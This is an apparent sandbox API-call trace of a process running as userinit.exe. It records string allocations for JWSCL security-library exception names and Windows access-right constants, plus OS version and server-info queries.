[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a2f6d8*="EJwsclNilPointer") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a2f6c0*="EJwsclUnimplemented") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a2f6a8*="EJwsclInitWellKnownException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a2f690*="EJwsclKeyApiException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a2f678*="EJwsclKeyException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a2f660*="EJwsclHashApiException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a2f648*="EJwsclHashException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a2f630*="EJwsclCSPApiException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a2f618*="EJwsclCSPException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a2f600*="EJwsclTerminalSessionException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a2f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a2f5d0*="EJwsclTerminalServiceException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a2f5b8*="EJwsclTerminalServerConnectException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a2f5a0*="EJwsclTerminalServerException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a2f588*="EJwsclCryptUnsupportedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a2f570*="EJwsclCryptApiException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a2f558*="EJwsclCryptException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a2f540*="EJwsclOSError") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a2f528*="EJwsclResourceInitFailed") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a2f510*="EJwsclResourceUnequalCount") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a2f4f8*="EJwsclResourceNotFound") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a2f4e0*="EJwsclResourceException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a2f4c8*="EJwsclFailedAddACE") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a2f4b0*="EJwsclUnsupportedACE") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a2f498*="EJwsclOpenWindowStationException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a2f480*="EJwsclWindowStationException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a2f468*="EJwsclCloseDesktopException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a2f450*="EJwsclCreateDesktopException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a2f438*="EJwsclOpenDesktopException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a2f420*="EJwsclDesktopException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a2f408*="EJwsclSACLAccessDenied") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a2f3f0*="EJwsclAccessDenied") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a2f3d8*="EJwsclLSAException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a2f3c0*="ESetOwnerException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a2f3a8*="ESetSecurityException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a2f390*="EJwsclInvalidParentDescriptor") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a2f378*="EJwsclInvalidKeyPath") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a2f360*="EJwsclInvalidGenericAccessMask") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a2f348*="EJwsclAdaptSecurityInfoException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a2f330*="EJwsclThreadException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a2f318*="EJwsclInvalidObjectException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a2f300*="EJwsclSecurityObjectException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a2f2e8*="EJwsclHashMismatch") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a2f2d0*="EJwsclStreamHashException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a2f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a2f2a0*="EJwsclStreamSizeException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a2f288*="EJwsclStreamException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a2f270*="EJwsclNoSuchLogonSession") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a2f258*="EJwsclInvalidFlagsException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a2f240*="EJwsclProcessNotFound") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a2f228*="EJwsclInvalidParameterException") returned 1
[0202.026] SysReAllocStringLen (in: pbstr=0x2a2f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a2f210*="EJwsclInvalidPathException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a2f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a2f1e0*="EJwsclInvalidRevision") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a2f1c8*="EJwsclInvalidAceMismatch") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a2f1b0*="EJwsclRevisionMismatchException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a2f198*="EJwsclInvalidACEException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a2f180*="EJwsclReadOnlyPropertyException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a2f168*="EJwsclDuplicateListEntryException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a2f150*="EJwsclIndexOutOfBoundsException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a2f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a2f120*="EJwsclInvalidKnownSIDException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a2f108*="EJwsclInvalidComputer") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a2f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a2f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a2f0c0*="EJwsclInvalidSIDException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a2f0a8*="EJwsclInvalidSecurityListException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a2f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a2f078*="EJwsclEmptyACLException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a2f060*="EJwsclNILParameterException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a2f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a2f030*="EJwsclInvalidObjectArrayException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a2f018*="EJwsclProcessIdNotAvailable") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a2f000*="EJwsclWinCallFailedException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a2efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a2efd0*="EJwsclNotImplementedException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a2efb8*="EJwsclAccessTypeException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a2efa0*="EJwsclAdjustPrivilegeException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a2ef88*="EJwsclPrivilegeCheckException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a2ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a2ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a2ef40*="EJwsclPrivilegeException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a2ef28*="EJwsclNotEnoughMemory") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a2ef10*="EJwsclInvalidTokenHandle") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a2eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a2eee0*="EJwsclDuplicateTokenException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a2eec8*="EJwsclInvalidOwnerException") returned 1
[0202.027] SysReAllocStringLen (in: pbstr=0x2a2eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a2eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a2ee98*="EJwsclTokenPrimaryException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a2ee80*="EJwsclTokenImpersonationException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a2ee68*="EJwsclTokenInformationException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a2ee50*="EJwsclSharedTokenException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a2ee38*="EJwsclOpenProcessTokenException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a2ee20*="EJwsclOpenThreadTokenException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a2ee08*="EJwsclSecurityException") returned 1
[0202.028] SysReAllocStringLen (in: pbstr=0x2a2edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a2edf0*="Exception") returned 1
[0202.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.028] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0202.028] GetVersionExA (in: lpVersionInformation=0x10f59c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x120000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xc4\xf5\x10") | out: lpVersionInformation=0x10f59c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0202.028] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0202.028] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0202.036] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0202.036] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x10f620 | out: bufptr=0x10f620) returned 0x0
[0202.041] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0202.041] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0202.041] NetApiBufferFree (Buffer=0x141d00) returned 0x0
[0202.041] SetErrorMode (uMode=0x8000) returned 0x1
[0202.041] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0202.042] SetErrorMode (uMode=0x1) returned 0x8000
[0202.042] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0202.043] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0202.045] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0202.047] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ec40*="DELETE") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ec30*="READ_CONTROL") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ec20*="WRITE_OWNER") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ec10*="WRITE_DAC") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a2ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a2ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a2ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a2ebd0*="FILE_WRITE_DATA") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a2ebc0*="FILE_READ_DATA") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a2ebb0*="FILE_ALL_ACCESS") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2eb80*="STANDARD_RIGHTS_READ") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2eb70*="STANDARD_RIGHTS_ALL") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2eb50*="DELETE") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2eb40*="READ_CONTROL") returned 1
[0202.048] SysReAllocStringLen (in: pbstr=0x2a2eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2eb30*="WRITE_OWNER") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2eb20*="WRITE_DAC") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a2eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a2eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a2eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a2eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a2ead0*="TOKEN_QUERY_SOURCE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a2eac0*="TOKEN_QUERY") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a2eab0*="TOKEN_IMPERSONATE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a2eaa0*="TOKEN_DUPLICATE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a2ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2ea80*="TOKEN_ALL_ACCESS") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2ea50*="STANDARD_RIGHTS_READ") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2ea40*="STANDARD_RIGHTS_ALL") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ea30*="DELETE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ea20*="READ_CONTROL") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ea10*="WRITE_OWNER") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ea00*="WRITE_DAC") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e9f0*="TIMER_MODIFY_STATE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a2e9e0*="TIMER_QUERY_STATE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e9d0*="TIMER_ALL_ACCESS") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e9a0*="STANDARD_RIGHTS_READ") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e990*="STANDARD_RIGHTS_ALL") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e980*="DELETE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e970*="READ_CONTROL") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e960*="WRITE_OWNER") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e950*="WRITE_DAC") returned 1
